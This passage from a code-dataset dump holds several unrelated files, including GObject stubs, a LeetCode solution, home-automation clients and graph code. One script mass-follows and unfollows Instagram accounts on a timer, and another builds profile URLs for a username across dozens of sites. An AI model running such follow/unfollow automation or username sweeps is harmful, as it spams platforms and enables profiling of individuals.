def is_floating(self): # real signature unknown; restored from __doc__
""" is_floating(self) -> bool """
return False
def list_properties(self): # real signature unknown; restored from __doc__
""" list_properties(self) -> list, n_properties:int """
return []
def new(self, schema_id, path): # real signature unknown; restored from __doc__
""" new(schema_id:str, path:str) -> Dazzle.SettingsSandwich """
pass
def newv(self, object_type, parameters): # real signature unknown; restored from __doc__
""" newv(object_type:GType, parameters:list) -> GObject.Object """
pass
def notify(self, property_name): # real signature unknown; restored from __doc__
""" notify(self, property_name:str) """
pass
def notify_by_pspec(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def override_property(self, property_id, name): # real signature unknown; restored from __doc__
""" override_property(self, property_id:int, name:str) """
pass
def ref(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def ref_sink(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def replace_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def replace_qdata(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def run_dispose(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def set_boolean(self, key, val): # real signature unknown; restored from __doc__
""" set_boolean(self, key:str, val:bool) """
pass
def set_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def set_double(self, key, val): # real signature unknown; restored from __doc__
""" set_double(self, key:str, val:float) """
pass
def set_int(self, key, val): # real signature unknown; restored from __doc__
""" set_int(self, key:str, val:int) """
pass
def set_properties(self, *args, **kwargs): # real signature unknown
pass
def set_property(self, *args, **kwargs): # real signature unknown
pass
def set_string(self, key, val): # real signature unknown; restored from __doc__
""" set_string(self, key:str, val:str) """
pass
def set_uint(self, key, val): # real signature unknown; restored from __doc__
""" set_uint(self, key:str, val:int) """
pass
def set_value(self, key, value): # real signature unknown; restored from __doc__
""" set_value(self, key:str, value:GLib.Variant) """
pass
def steal_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def steal_qdata(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def stop_emission(self, detailed_signal): # reliably restored by inspect
""" Deprecated, please use stop_emission_by_name. """
pass
def stop_emission_by_name(*args, **kwargs): # reliably restored by inspect
""" signal_stop_emission_by_name(instance:GObject.Object, detailed_signal:str) """
pass
def thaw_notify(self): # real signature unknown; restored from __doc__
""" thaw_notify(self) """
pass
def unbind(self, property): # real signature unknown; restored from __doc__
""" unbind(self, property:str) """
pass
def unref(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def watch_closure(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def weak_ref(self, *args, **kwargs): # real signature unknown
pass
def _force_floating(self, *args, **kwargs): # real signature unknown
""" force_floating(self) """
pass
def _ref(self, *args, **kwargs): # real signature unknown
""" ref(self) -> GObject.Object """
pass
def _ref_sink(self, *args, **kwargs): # real signature unknown
""" ref_sink(self) -> GObject.Object """
pass
def _unref(self, *args, **kwargs): # real signature unknown
""" unref(self) """
pass
def _unsupported_data_method(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def _unsupported_method(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __deepcopy__(self, *args, **kwargs): # real signature unknown
pass
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self, **properties): # real signature unknown; restored from __doc__
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
g_type_instance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
qdata = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
ref_count = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__gpointer__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__grefcount__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
props = None # (!) real value is '<gi._gi.GProps object at 0x7f3b25efe460>'
__class__ = None # (!) real value is "<class 'gi.types.GObjectMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': ObjectInfo(SettingsSandwich), '__module__': 'gi.repository.Dazzle', '__gtype__': <GType DzlSettingsSandwich (93962411670528)>, '__doc__': None, '__gsignals__': {}, 'new': gi.FunctionInfo(new), 'append': gi.FunctionInfo(append), 'bind': gi.FunctionInfo(bind), 'bind_with_mapping': gi.FunctionInfo(bind_with_mapping), 'get_boolean': gi.FunctionInfo(get_boolean), 'get_default_value': gi.FunctionInfo(get_default_value), 'get_double': gi.FunctionInfo(get_double), 'get_int': gi.FunctionInfo(get_int), 'get_string': gi.FunctionInfo(get_string), 'get_uint': gi.FunctionInfo(get_uint), 'get_user_value': gi.FunctionInfo(get_user_value), 'get_value': gi.FunctionInfo(get_value), 'set_boolean': gi.FunctionInfo(set_boolean), 'set_double': gi.FunctionInfo(set_double), 'set_int': gi.FunctionInfo(set_int), 'set_string': gi.FunctionInfo(set_string), 'set_uint': gi.FunctionInfo(set_uint), 'set_value': gi.FunctionInfo(set_value), 'unbind': gi.FunctionInfo(unbind)})"
__gdoc__ = 'Object DzlSettingsSandwich\n\nProperties from DzlSettingsSandwich:\n path -> gchararray: Settings Path\n Settings Path\n schema-id -> gchararray: Schema Id\n Schema Id\n\nSignals from GObject:\n notify (GParam)\n\n'
__gsignals__ = {}
__gtype__ = None # (!) real value is '<GType DzlSettingsSandwich (93962411670528)>'
__info__ = ObjectInfo(SettingsSandwich)
| [
"ttys3@outlook.com"
] | ttys3@outlook.com |
8dc31ef220e3a12803bb906e33892e6ea9a93a18 | b00873d36e44128ce30623da0ee3b556e4e3d7e7 | /solutions/solution725.py | 534be36c9402b8115b72bfe0c67a417dff55304b | [
"MIT"
] | permissive | Satily/leetcode_python_solution | b4aadfd1998877b5086b5423c670750bb422b2c8 | 3f05fff7758d650469862bc28df9e4aa7b1d3203 | refs/heads/master | 2021-07-18T07:53:10.387182 | 2021-07-17T06:30:09 | 2021-07-17T06:30:09 | 155,074,789 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,157 | py | from data_structure import ListNode, build_link_list, flatten_link_list
class Solution:
def splitListToParts(self, root, k):
"""
:type root: ListNode
:type k: int
:rtype: List[ListNode]
"""
def split(h, lh):
if h is not None:
p = h
for _ in range(lh - 1):
p = p.next
q = p.next
p.next = None
return q, h
else:
return None, None
lr, p = 0, root
while p is not None:
p, lr = p.next, lr + 1
n, r = lr // k, lr % k
result = []
for i in range(k):
l = n
if i < r:
l += 1
root, head = split(root, l)
result.append(head)
return result
if __name__ == "__main__":
inputs = [
# ([1, 2, 3], 5),
([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3),
]
for root_list, k in inputs:
root = build_link_list(root_list)
result = [flatten_link_list(head) for head in Solution().splitListToParts(root, k)]
print(result)
| [
"houjiaxu@xiaomi.com"
] | houjiaxu@xiaomi.com |
c3fed80595739ad1d496d693798265472af3607a | 6439bf971c39fc99813b6330532c3dce15e9da4a | /__SocialMedia_Sites.py | af4c328cf9d4536b5aabd7a9a8bc93e5993f2be8 | [
"MIT"
] | permissive | elithaxxor/pi_repo | 830c07059d1b779270eeb467de381d9cef44eedb | 8e54e32dfcc06ce777d13010b3d1efb1fd9ef43a | refs/heads/main_pi | 2023-08-10T16:00:53.868384 | 2021-10-04T23:55:20 | 2021-10-04T23:55:20 | 412,363,849 | 0 | 0 | MIT | 2021-10-01T07:13:14 | 2021-10-01T07:03:25 | null | UTF-8 | Python | false | false | 5,432 | py | #import socialmedia
#from socialmedia import USERNAME
USERNAME = input(f'[sys] Enter Username:' )
# INSTAGRAM
instagram = f'https://www.instagram.com/{USERNAME}'
# FACEBOOK
facebook = f'https://www.facebook.com/{USERNAME}'
#TWITTER
twitter = f'https://www.twitter.com/{USERNAME}'
# YOUTUBE
youtube = f'https://www.youtube.com/{USERNAME}'
# BLOGGER
blogger = f'https://{USERNAME}.blogspot.com'
# GOOGLE+
google_plus = f'https://plus.google.com/s/{USERNAME}/top'
# REDDIT
reddit = f'https://www.reddit.com/user/{USERNAME}'
# WORDPRESS
wordpress = f'https://{USERNAME}.wordpress.com'
# PINTEREST
pinterest = f'https://www.pinterest.com/{USERNAME}'
# GITHUB
github = f'https://www.github.com/{USERNAME}'
# TUMBLR
tumblr = f'https://{USERNAME}.tumblr.com'
# FLICKR
flickr = f'https://www.flickr.com/people/{USERNAME}'
# STEAM
steam = f'https://steamcommunity.com/id/{USERNAME}'
# VIMEO
vimeo = f'https://vimeo.com/{USERNAME}'
# SOUNDCLOUD
soundcloud = f'https://soundcloud.com/{USERNAME}'
# DISQUS
disqus = f'https://disqus.com/by/{USERNAME}'
# MEDIUM
medium = f'https://medium.com/@{USERNAME}'
# DEVIANTART
deviantart = f'https://{USERNAME}.deviantart.com'
# VK
vk = f'https://vk.com/{USERNAME}'
# ABOUT.ME
aboutme = f'https://about.me/{USERNAME}'
# IMGUR
imgur = f'https://imgur.com/user/{USERNAME}'
# FLIPBOARD
flipboard = f'https://flipboard.com/@{USERNAME}'
# SLIDESHARE
slideshare = f'https://slideshare.net/{USERNAME}'
# FOTOLOG
fotolog = f'https://fotolog.com/{USERNAME}'
# SPOTIFY
spotify = f'https://open.spotify.com/user/{USERNAME}'
# MIXCLOUD
mixcloud = f'https://www.mixcloud.com/{USERNAME}'
# SCRIBD
scribd = f'https://www.scribd.com/{USERNAME}'
# BADOO
badoo = f'https://www.badoo.com/en/{USERNAME}'
# PATREON
patreon = f'https://www.patreon.com/{USERNAME}'
# BITBUCKET
bitbucket = f'https://bitbucket.org/{USERNAME}'
# DAILYMOTION
dailymotion = f'https://www.dailymotion.com/{USERNAME}'
# ETSY
etsy = f'https://www.etsy.com/shop/{USERNAME}'
# CASHME
cashme = f'https://cash.me/{USERNAME}'
# BEHANCE
behance = f'https://www.behance.net/{USERNAME}'
# GOODREADS
goodreads = f'https://www.goodreads.com/{USERNAME}'
# INSTRUCTABLES
instructables = f'https://www.instructables.com/member/{USERNAME}'
# KEYBASE
keybase = f'https://keybase.io/{USERNAME}'
# KONGREGATE
kongregate = f'https://kongregate.com/accounts/{USERNAME}'
# LIVEJOURNAL
livejournal = f'https://{USERNAME}.livejournal.com'
# ANGELLIST
angellist = f'https://angel.co/{USERNAME}'
# LAST.FM
last_fm = f'https://last.fm/user/{USERNAME}'
# DRIBBBLE
dribbble = f'https://dribbble.com/{USERNAME}'
# CODECADEMY
codecademy = f'https://www.codecademy.com/{USERNAME}'
# GRAVATAR
gravatar = f'https://en.gravatar.com/{USERNAME}'
# PASTEBIN
pastebin = f'https://pastebin.com/u/{USERNAME}'
# FOURSQUARE
foursquare = f'https://foursquare.com/{USERNAME}'
# ROBLOX
roblox = f'https://www.roblox.com/user.aspx?USERNAME={USERNAME}'
# GUMROAD
gumroad = f'https://www.gumroad.com/{USERNAME}'
# NEWSGROUND
newsground = f'https://{USERNAME}.newgrounds.com'
# WATTPAD
wattpad = f'https://www.wattpad.com/user/{USERNAME}'
# CANVA
canva = f'https://www.canva.com/{USERNAME}'
# CREATIVEMARKET
creative_market = f'https://creativemarket.com/{USERNAME}'
# TRAKT
trakt = f'https://www.trakt.tv/users/{USERNAME}'
# 500PX
five_hundred_px = f'https://500px.com/{USERNAME}'
# BUZZFEED
buzzfeed = f'https://buzzfeed.com/{USERNAME}'
# TRIPADVISOR
tripadvisor = f'https://tripadvisor.com/members/{USERNAME}'
# HUBPAGES
hubpages = f'https://{USERNAME}.hubpages.com'
# CONTENTLY
contently = f'https://{USERNAME}.contently.com'
# HOUZZ
houzz = f'https://houzz.com/user/{USERNAME}'
#BLIP.FM
blipfm = f'https://blip.fm/{USERNAME}'
# WIKIPEDIA
wikipedia = f'https://www.wikipedia.org/wiki/User:{USERNAME}'
# HACKERNEWS
hackernews = f'https://news.ycombinator.com/user?id={USERNAME}'
# CODEMENTOR
codementor = f'https://www.codementor.io/{USERNAME}'
# REVERBNATION
reverb_nation = f'https://www.reverbnation.com/{USERNAME}'
# DESIGNSPIRATION
designspiration = f'https://www.designspiration.net/{USERNAME}'
# BANDCAMP
bandcamp = f'https://www.bandcamp.com/{USERNAME}'
# COLOURLOVERS
colourlovers = f'https://www.colourlovers.com/love/{USERNAME}'
# IFTTT
ifttt = f'https://www.ifttt.com/p/{USERNAME}'
# EBAY
ebay = f'https://www.ebay.com/usr/{USERNAME}'
# SLACK
slack = f'https://{USERNAME}.slack.com'
# OKCUPID
okcupid = f'https://www.okcupid.com/profile/{USERNAME}'
# TRIP
trip = f'https://www.trip.skyscanner.com/user/{USERNAME}'
# ELLO
ello = f'https://ello.co/{USERNAME}'
# TRACKY
tracky = f'https://tracky.com/user/~{USERNAME}'
# BASECAMP
basecamp = f'https://{USERNAME}.basecamphq.com/login'
#
''' WEBSITE LIST - USE FOR SEARCHING OF USERNAME '''
WEBSITES = [
instagram, facebook, twitter, youtube, blogger, google_plus, reddit,
wordpress, pinterest, github, tumblr, flickr, steam, vimeo, soundcloud, disqus,
medium, deviantart, vk, aboutme, imgur, flipboard, slideshare, fotolog, spotify,
mixcloud, scribd, badoo, patreon, bitbucket, dailymotion, etsy, cashme, behance,
goodreads, instructables, keybase, kongregate, livejournal, angellist, last_fm,
dribbble, codecademy, gravatar, pastebin, foursquare, roblox, gumroad, newsground,
wattpad, canva, creative_market, trakt, five_hundred_px, buzzfeed, tripadvisor, hubpages,
contently, houzz, blipfm, wikipedia, hackernews, reverb_nation, designspiration,
bandcamp, colourlovers, ifttt, ebay, slack, okcupid, trip, ello, tracky, basecamp]
#
| [
"noreply@github.com"
] | elithaxxor.noreply@github.com |
be997587cc38355d84971511c1c26382c31d8d72 | 9e4792da65829c0605d42e27a79f568f7ad8cc30 | /Transmit_Ardino.py | 1661509706b626696d582c01421950c4905af4f2 | [] | no_license | mihirkawatra/homeautomation | 88aa1b8e556128e0293dbb6369ea96b8750b3ca5 | 4c9cddca89b562a5d7c398cff4c1ecdc9ac2d3a8 | refs/heads/master | 2020-04-23T08:30:10.857158 | 2019-02-16T18:51:11 | 2019-02-16T18:51:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 587 | py | import serial
k = str("")
response = str("")
def transmit(msg):
ser = serial.Serial('com4',9600,parity=serial.PARITY_NONE,stopbits=serial.STOPBITS_ONE,bytesize=serial.EIGHTBITS,timeout=1)
if(msg=="on" or msg == "three"):
k = "on"
elif(msg=="off"):
k="off"
elif(msg=="fan_on"):
k="fan_on"
elif(msg=="fan_off"):
k="fan_off"
elif(msg=="all_on"):
k="all_on"
elif(msg=="all_off"):
k="all_off"
for i in range(0,5):
ser.write(k.encode())
response = ser.readline().strip().decode("utf-8")
print("Response: "+response)
ser.close
transmit("all_off") | [
"mihirkawatra98@gmail.com"
] | mihirkawatra98@gmail.com |
a39449cefa7af5148914f91fc5647fafe9ca4355 | c8c790edfce8522ce196955c7da4494d34a0290c | /insta_auto.py | 9a34d320961126f5ec3638690e369f87da978041 | [
"MIT"
] | permissive | anounman/Insta-Follow-Boster-For-Indian-Users-With-Python | c36b2932c6bff593155b291464de67b71b165b76 | e476b48e3a3371178f1c9188de1833d0856a05b0 | refs/heads/master | 2023-04-06T23:38:03.512395 | 2021-04-03T05:55:09 | 2021-04-03T05:55:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 843 | py | from time import sleep
import datetime
import random
from instagram_private_api import Client, ClientCompatPatch
username = "username"
password = "password"
try:
api = Client(username, password)
except Exception as e :
print(e)
sleep(random.randint(200, 300))
pass
def follow():
f = open('ids.txt', 'r')
id = f.read()
id = id.split('/')
for ids in id:
api.friendships_create(ids)
sleep(random.randint(6, 10))
f.close()
def unfollow():
f = open('ids.txt', 'r')
id = f.read()
id = id.split('/')
for ids in id:
api.friendships_destroy(ids)
sleep(random.randint(6, 10))
f.close()
def run():
while True:
print("Start Follow")
follow()
sleep(7200)
print("Start Unfollow")
unfollow()
sleep(7200)
run()
| [
"noreply@github.com"
] | anounman.noreply@github.com |
c3784b117e770c6c6948e80849e5bd8cf0457254 | 7727187a009e4b9c46c2fe06609372ec8814cd23 | /test/test_augment_data.py | d83bec586121132d679dc61a95c78929cece6eea | [] | no_license | govtmirror/freemix-akara | ebf204554f4effc0543e60083698f2ea012413b8 | 1d10c3f02afbd4268852e2c52afdf77809176bdd | refs/heads/master | 2021-01-12T07:47:08.183429 | 2014-06-05T18:53:56 | 2014-06-05T18:53:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 809 | py | import os
import urllib, urllib2
from urllib2 import urlopen
from freemix_akara import __version__
from server_support import server
RESOURCE_DIR = os.path.join(os.path.dirname(__file__), "resource")
def test_augment():
import simplejson
url = server() + "augment.freemix.json"
req = urllib2.Request(url)
data = open(os.path.join(RESOURCE_DIR, "augment", "augment_test1.js")).read()
response = urllib2.urlopen(req, data)
results = simplejson.load(response)
assert "items" in results
def test_mix():
import simplejson
url = server() + "mix.freemix.json"
req = urllib2.Request(url)
data = open(os.path.join(RESOURCE_DIR, "mix", "mix.js")).read()
response = urllib2.urlopen(req, data)
results = simplejson.load(response)
assert "items" in results
| [
"dfeeney@gmail.com"
] | dfeeney@gmail.com |
67d57a5427e0bd112d0c8b58a7e3fcc7a4b6cac6 | a76401f82ed1c9ac47ddaff27681b90f37627426 | /.history/student_olx/main/models_20210914210437.py | 4dc4e069e91d0907166c727d7146b7a75b293961 | [] | no_license | RiteshK555/itw-project | e90e1dd13517ee8b07d72cc3bd5a42af367ab587 | a2e4c8682c2030ff77da9ade5ae4677bd475f87a | refs/heads/master | 2023-08-30T03:48:58.904979 | 2021-11-10T09:50:59 | 2021-11-10T09:50:59 | 410,032,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | from django.db import models
# Create your models here.
class ToDoList(models.Model):
name=models.CharField(max_length=100)
def __str__(self):
return self.name
class Item(models.Model):
todolist=models.ForeignKey(ToDoList,on_delete=models.CASCADE)
text=models.CharField(max_length=100)
complete=models.BooleanField()
def __str__(self):
return self.texta
| [
""
] | |
0bb1525310eb1413798c18b37fff07653451452a | 477c6821a11a8fbd0aa0f941be0bdece423d159d | /venv/bin/flask | 0f20895c4ca369ffb602363ea11844488cc35787 | [] | no_license | ruthviksai/WeatherApp | 0f9cf5b328f2cb6b01baea1740fe3b5a6f8c9e0e | 14ba6e1b356067bcfd3434af9191b23d9cf234ca | refs/heads/master | 2021-06-27T10:50:11.690968 | 2019-09-28T20:11:35 | 2019-09-28T20:11:35 | 211,556,027 | 0 | 0 | null | 2021-03-20T01:46:58 | 2019-09-28T20:10:39 | Python | UTF-8 | Python | false | false | 247 | #!/Users/ruthvik/Desktop/WeatherApp/venv/bin/python3.7
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"ruthvs@uw.edu"
] | ruthvs@uw.edu | |
59560666f370de54095a5d4639b4b0ef6157eb06 | 5b91fa8588c7b8b556c027e308321f59ac7cf5f3 | /src/parameters/lgb.py | 2fafc10c6faf6a1d658adff4fe78a57ebb66abd1 | [] | no_license | ykfujita/jpx1-3rd | 0cd8a25cfd1d85ff0a69af52e73d3f14d54d0785 | e632f4663f2422730c5b5279ecc971d7345bec59 | refs/heads/main | 2023-07-06T21:25:44.661074 | 2021-07-21T20:31:58 | 2021-07-21T20:31:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,479 | py | from src.eval.spearmanr import custum_eval, custum_eval_sklearn
model_params = {
'objective': 'regression',
'metric': 'spearmanr',
# 'learning_rate': 0.01,
}
# sklearn interfaceでfitされるときに渡すパラメタ
fit_params = {
'eval_metric': custum_eval_sklearn,
'early_stopping_rounds': 100
}
# optunaを通してlgb.trainに渡されるパラメタ
hpo_params = {
'feval': custum_eval
}
best_params1 = {
'objective': 'regression',
'metric': 'spearmanr',
'feature_pre_filter': False,
'verbosity': -1,
'lambda_l1': 0.16889530286745985,
'lambda_l2': 1.2410595580996777e-06,
'num_leaves': 31,
'feature_fraction': 0.5,
'bagging_fraction': 0.9000256584722999,
'bagging_freq': 5,
'min_child_samples': 5,
'num_iterations': 10000,
}
best_params2 = {
'objective': 'regression',
'metric': 'spearmanr',
'feature_pre_filter': False,
'verbosity': -1,
'lambda_l1': 8.062872033881925,
'lambda_l2': 0.026625655716661895,
'num_leaves': 92,
'feature_fraction': 0.5,
'bagging_fraction': 1.0,
'bagging_freq': 0,
'min_child_samples': 25,
'num_iterations': 10000,
}
best_params_dict = {
'label_high_20':
{
# 'boosting_type': 'gbdt',
# 'class_weight': None,
# 'colsample_bytree': 1.0,
# 'importance_type': 'split',
# 'learning_rate': 0.1,
# 'max_depth': -1,
# 'min_child_samples': 20,
# 'min_child_weight': 0.001,
# 'min_split_gain': 0.0,
# 'n_estimators': 100,
# 'n_jobs': -1,
'objective': 'regression',
'metric': 'spearmanr',
# 'random_state': None,
# 'reg_alpha': 0.0,
# 'reg_lambda': 0.0,
# 'silent': True,
# 'subsample': 1.0,
# 'subsample_for_bin': 200000,
# 'subsample_freq': 0,
'feature_pre_filter': False,
'verbosity': -1,
'lambda_l1': 0.0035375367055248907,
'lambda_l2': 0.24776283117729828,
'num_leaves': 253,
'feature_fraction': 0.5,
'bagging_fraction': 1.0,
'bagging_freq': 0,
'num_iterations': 10000,
# 'early_stopping_round': 100
},
'label_low_20':
{
# 'boosting_type': 'gbdt',
# 'class_weight': None,
# 'colsample_bytree': 1.0,
# 'importance_type': 'split',
# 'learning_rate': 0.1,
# 'max_depth': -1,
# 'min_child_samples': 20,
# 'min_child_weight': 0.001,
# 'min_split_gain': 0.0,
# 'n_estimators': 100,
# 'n_jobs': -1,
'objective': 'regression',
'metric': 'spearmanr',
# 'random_state': None,
# 'reg_alpha': 0.0,
# 'reg_lambda': 0.0,
# 'silent': True,
# 'subsample': 1.0,
# 'subsample_for_bin': 200000,
# 'subsample_freq': 0,
'feature_pre_filter': False,
'verbosity': -1,
'lambda_l1': 0.0005732579932630379,
'lambda_l2': 4.614903511074905e-06,
'num_leaves': 31,
'feature_fraction': 0.6,
'bagging_fraction': 1.0,
'bagging_freq': 0,
'num_iterations': 10000,
# 'early_stopping_round': 100
}
}
| [
"charmer.popopo@gmail.com"
] | charmer.popopo@gmail.com |
97acc03ad3a35a433738121b10ab65da2dade94f | 409924961d406d274eccd872db21c29c6cc36d38 | /pymoticz.py | 97b39c07f2f4ab0e2f478aa2dec250b50816e115 | [] | no_license | EirikAskheim/pymoticz | 580b1f6a1080b933a2096acaaefe0cbf7a570feb | 03401ba2e9b602aca03d808560cd2a277a4df363 | refs/heads/master | 2016-09-09T23:46:02.891189 | 2013-03-06T21:53:11 | 2013-03-06T21:53:11 | 8,611,079 | 2 | 6 | null | null | null | null | UTF-8 | Python | false | false | 3,019 | py | #!/usr/bin/env python
"""Usage:
pymoticz list [--host=<host>] [--names]
pymoticz test
pymoticz status <id> [--host=<host>]
pymoticz on <id> [--host=<host>]
pymoticz off <id> [--host=<host>]
pymoticz dim <id> <level> [--host=<host>]
"""
import requests
import json
__all__ = [ 'Pymoticz' ]
__version__ = '0.1'
class Pymoticz:
DIMMER = u'Dimmer'
ON_OFF = u'On/Off'
SWITCH_TYPES=[ DIMMER, ON_OFF ]
def __init__(self, domoticz_host='127.0.0.1:8080'):
self.host = domoticz_host
def _request(self, url):
r=requests.get(url)
if r.status_code == 200:
return json.loads(r.text)
else:
raise
def list_names(self):
l=self.list()
return [device['Name'] for device in l['result']]
def list(self):
url='http://%s/json.htm?type=devices&used=true' % self.host
return self._request(url)
def turn_on(self, _id):
url='http://%s/json.htm?type=command¶m=switchlight&idx=%s&switchcmd=On' % (self.host, _id)
return self._request(url)
def turn_off(self, _id):
url='http://%s/json.htm?type=command¶m=switchlight&idx=%s&switchcmd=Off&level=0' % (self.host, _id)
return self._request(url)
def dim(self, _id, level):
d=self.get_device(_id)
if d is None:
return 'No device with that id.'
max_dim=d['MaxDimLevel']
if int(level) > max_dim or int(level) < 0:
return 'Level has to be in the range 0 to %d' % max_dim
url='http://%s/json.htm?type=command¶m=switchlight&idx=%s&switchcmd=Set Level&level=%s' % (self.host, _id, level)
return self._request(url)
def get_device(self, _id):
l=self.list()
try:
device=[i for i in l['result'] if i['idx'] == u'%s' % _id][0]
except:
return None
return device
def get_light_status(self, _id):
light = self.get_device(_id)
if light is None:
return 'No device with that id.'
if light['SwitchType'] not in self.SWITCH_TYPES:
return 'Not a light switch'
elif light['SwitchType'] == self.DIMMER:
return light['Level']
elif light['SwitchType'] == self.ON_OFF:
return light['Status']
if __name__ == '__main__':
from docopt import docopt
from pprint import pprint
args=docopt(__doc__, version=__version__)
p=None
if args['--host']:
p=Pymoticz(args['--host'])
else:
p=Pymoticz()
if args['list']:
if args['--names']:
print('\n'.join(p.list_names()))
else:
pprint(p.list())
elif args['status']:
response = p.get_light_status(args['<id>'])
print(response)
elif args['on']:
response = p.turn_on(args['<id>'])
elif args['off']:
response = p.turn_off(args['<id>'])
elif args['dim']:
response = p.dim(args['<id>'], args['<level>'])
print(response)
| [
"eirik.askheim@gmail.com"
] | eirik.askheim@gmail.com |
27f0647ab06a5b9260d9c3e0850850fed952ff92 | e7a9239cbab66ad08e70b4961bbeadfd726cf983 | /org/konghiran/lesson/_00_python_object_and_data_structure_basic/_02_variable_assign.py | 17e0292183e66173a68b2142a9068a9e407895dd | [] | no_license | kidpeterpan/my-python-tutorials | 5a38a33cd5e39bac55b34b4f7d7f7f65a1c1bf96 | 14b89ad01c2b209d2a76ab324ca27867cec5d1c6 | refs/heads/master | 2020-11-24T12:23:27.526993 | 2020-01-10T00:38:27 | 2020-01-10T00:38:27 | 228,141,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py |
# container = value
# dynamic type, no need type declaration
my_dogs = 2
print("value is ", my_dogs)
print("type is ", type(my_dogs)) | [
"zealotkid711@gmail.com"
] | zealotkid711@gmail.com |
7c5b72f5791bf236f67f5a96f18f52171a8fadb4 | 1fdde494b9d5f03be7935e726b810795a1cbd3e9 | /code for comparing with others/permanence_igraph.py | 152a14b0ccd07f9cc0022e2e218c5991a3cfa0ac | [] | no_license | KingofTetris/Permanence-Dynamic-Game | bda83d3a43ec1da8f0c289c85f14cfb5eab338c7 | c8518720a9857799e09e3c7cc4a670ed114d8d82 | refs/heads/master | 2023-03-16T08:16:05.626699 | 2018-05-15T20:11:19 | 2018-05-15T20:11:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,740 | py | from collections import defaultdict
def permanence_node_igraph(g,clustering,node_v):
'''
This function is used for calculating the permanence of community result w.r.t a vertex.
The input will be igraph classes Graph and VertexClustering,Vertex.
'''
if node_v not in g.vs:
print "There isn't a node %d in the graph" % node_v
return None
community_v = clustering.membership[node_v.index]
"When node_v is in a singleton community, permanence is zero"
if len(clustering[community_v])==1:
return 0
"Initialization for the permanence"
permanence = 0
"neighbor set of node v"
neighbor_list = node_v.neighbors()
degree_v = node_v.degree()
"Initialization the inner edges for each community"
inner_edges = 0
e_max_exist_test = False
for node in neighbor_list:
"Test whether there is external edges"
if node.index not in clustering[community_v]:
e_max_exist_test = True
break
"When E_max=0, permanence of node_v is its clustering coefficient inside the community."
if e_max_exist_test == False:
for node_i in neighbor_list:
for node_j in neighbor_list:
if node_i in node_j.neighbors() or node_j in node_i.neighbors():
inner_edges += 1
"Debug TODO:"
if len(neighbor_list) <= 2:
"The nodes in community is less than 2, clustering is 0"
"Debug: TODO:"
clustering_coefficient = 1
"clustering_coefficient = 0"
else:
"Otherwise, do computation"
clustering_coefficient = inner_edges /float( len(neighbor_list) * (len(neighbor_list)-1) )
permanence = clustering_coefficient
else:
"When E_max != 0"
"The nodes inside the community and neighboring node_v"
inner_node_list = []
external_node_list = []
for node in neighbor_list:
if node.index in clustering[community_v]:
inner_node_list.append(node)
else:
external_node_list.append(node)
community_number_dict = defaultdict(lambda: 0)
for node_e in external_node_list:
community_number_dict[clustering.membership[node_e.index]] += 1
